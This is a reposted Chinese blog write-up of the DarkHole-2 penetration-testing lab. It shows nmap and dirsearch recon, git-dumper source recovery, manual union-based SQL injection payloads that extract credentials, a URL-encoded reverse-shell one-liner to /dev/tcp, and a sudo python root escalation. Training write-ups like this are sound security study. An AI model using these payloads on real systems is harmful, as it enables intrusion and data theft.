Neos的渗透测试靶机练习——DarkHole-2

这篇具有很好参考价值的文章主要介绍了Neos的渗透测试靶机练习——DarkHole-2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DarkHole-2(网卡初始为仅主机模式,要有安全意识)

靶机网卡有问题需要提前修改,进入系统前先按shift,
然后按e进入编辑模式,
将ro 至 initrd之前 的内容修改为 rw single init=/bin/bash,
然后按ctrl + x,重新设置password(输入passwd 然后输入想设置的密码),
输入vim /etc/netplan/00-installer-config.yaml,
将其中的ens33修改为enp0s17,
保存后关靶机,
至此 重启靶机 在攻击机中可搜到ip。

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
输入ifconfig查询自身ip,即攻击机ip
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
可以看到自身ip192.168.56.101
输入arp-scan -l扫描本网段存活主机,即靶机ip地址
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
可以看到靶机ip192.168.56.105,。
输入nmap -sV -p- 192.168.56.105扫描靶机所有端口开放情况
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
可以看到端口22、80是开放的。
浏览器输入192.168.56.105:80。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器

命令行输入whatweb 192.168.56.105查询网站指纹信息
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
没什么关键信息。
输入dirsearch -u http://192.168.56.105,扫描网站目录。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
扫描出来个/.git/目录,这个目录是本次渗透测的关键点,因为可以通过两个工具githack、git-dumper得到网页源代码。
我们这里使用git-dumper
先下载安装pip install git-dumper,然后输入git-dumper http://192.168.56.105/.git/ neosHack将源代码导入本地neosHack目录中。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器

2. git文件泄露

我们进入该目录,输入git log查看日志。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
发现有三次提交记录,我们使用git diff命令挨个查看三次提交在哪里修改过代码。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
发现第二条有修改代码的记录,并在其中发现了一个邮箱用户lush@admin.com密码321
我们使用这个账号重新登陆页面。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
点击提交按钮没有用,但是URL有一个参数id。我刚经历过sqli-labs的洗礼,本能的认为这里有SQL注入,我们不用sqlmap了,手动测一下。
我做了一个SQL注入专项靶场训练,感兴趣的可以看我这一篇文章:Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南,里面基本上涉及到SQL注入所有技巧了。

3. SQL注入

1)测试是数字型注入还是字符型注入:
构造参数:?id=1 and 1=1?id=1 and 1=2,发现二者页面显示内容相同,说明不是数字型注入;
2)判断闭合点
添加单引号:?id=1',页面空白,重新添加双引号:?id=1",页面正常显示,说明是字符型单引号闭合。
3)测试数据表的列数
构造参数:?id=1' order by 6 -- neos,正常显示,当order by 7时页面空白,说明数据表为6列。
4)测试回显位
构造参数:?id=-1' union select 1,2,3,4,5,6 -- neos,发现回显位为2,3,5,6号位。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
5)联合注入:
有这么多的回显位,我们可以一次性测出很多东西。
1>测数据库名
我们构造参数:?id=-1' union select 1,database(),version(),4,@@basedir,@@datadir -- neosNeos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
我们在对应的回显位分别测出了数据库名版本数据库的安装路径数据库文件的存放路径
2>测数据表名
我们继续构造参数:?id=-1' union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database() -- neos
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
测出了数据库darkhole_2有两个数据表sshusers
3>测属性名
我们分别测ssh表和users表有哪些属性名。
ssh表:?id=-1' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='ssh' -- neos,发现该表有三个属性名id、pass、user
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
users表:?id=-1' union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='users' -- neos,发现有很多个属性名,但我们只需要知道id,password,username这三个属性即可。这里没显示全,这种情况下我们可以借助limit关键字来将剩余的属性名测出来,比如构造参数:?id=-1' union select 1,2,column_name,4,5,6 from information_schema.columns where table_name='users' limit 6,1-- neos得知那个没显示全的属性名为CURRENT_CONNECTIONS
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
4>测数据项
测ssh表的所有内容:?id=-1' union select 1,2,group_concat(id),4,group_concat(username),group_concat(password) from ssh-- neos,发现只有一个用户jehad,密码为fool
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
测users表的所有内容:?id=-1' union select 1,2,group_concat(id),4,group_concat(username),group_concat(password) from users -- neos,发现依然只有一个用户。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
6)登陆账号
我们使用ssh表中的那个jehad用户ssh登陆。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器

4. 提权

sudo -lfind / -perm -u=s -type f 2>/dev/null没发现什么可以提权的地方。
我们继续输入cat .bash_history查看历史文件,发现9999端口是有服务的。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
我们输入ss -antp,查看socket信息,发下9999端口确实有活动信息。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
输入cat /etc/crontab,查看定时任务信息,发现另一个用户losy
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
输入curl "http://127.0.0.1:9999/?cmd=whoami",发现9999端口可以以losy的权限执行命令:
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
那么losy就是我们的目标了。9999端口没办法访问,我们重新ssh连接,将本地端口 9999端口与靶机端口映射,访问本机9999端口转发到靶机9999端口:ssh jehad@192.168.56.105 -L 9999:localhost:9999
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
本地监听nc -lvvp 4444
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
然后构造命令bash -c 'bash -i >& /dev/tcp/192.168.56.101/4444 0>&1',对其进行URL编码。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
靶机输入curl http://127.0.0.1:9999/?cmd=bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.56.101%2f4444+0%3e%261%27,成功反弹losy的shell。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
我们查看/home/losy目录下的.bash_history文件发现下面有losy的密码。
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
我们ssh登陆losy用户,
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
发现可以以root执行python,
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
我们直接输入sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")',成功提权到root,并在/root目录下发现flag!!!
Neos的渗透测试靶机练习——DarkHole-2,靶场练习,渗透测试,网络安全,sql,git,服务器
至此,渗透结束。


三、总结

本次渗透测试总体来讲比较简单的,都是以往渗透遇到的经典操作,注意一下git文件泄露,及SQL注入漏洞的原理即可。文章来源地址https://www.toymoban.com/news/detail-818024.html


到了这里,关于Neos的渗透测试靶机练习——DarkHole-2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(32)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(39)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(32)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(51)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(44)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(36)
  • DC-1靶机渗透测试详细教程

    DC-1下载:https://download.vulnhub.com/dc/DC-1.zip 攻击者kali   IP:192.168.1.9 受害者DC-1   IP:192.168.1.8 将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。 1 使用命令 arp-scan -l 列出当前局域网的所有设备

    2024年02月08日
    浏览(31)
  • DC-6靶机测试渗透详细教程

    1、首先扫描我们要渗透机器的IP 2、 接着我们扫描IP的端口和操作系统  我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问      发现没有任何注入点 3、接着我

    2024年02月17日
    浏览(35)
  • 16个网络安全常用的练习靶场(小白必备)

    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Ironge

    2024年02月02日
    浏览(60)
  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包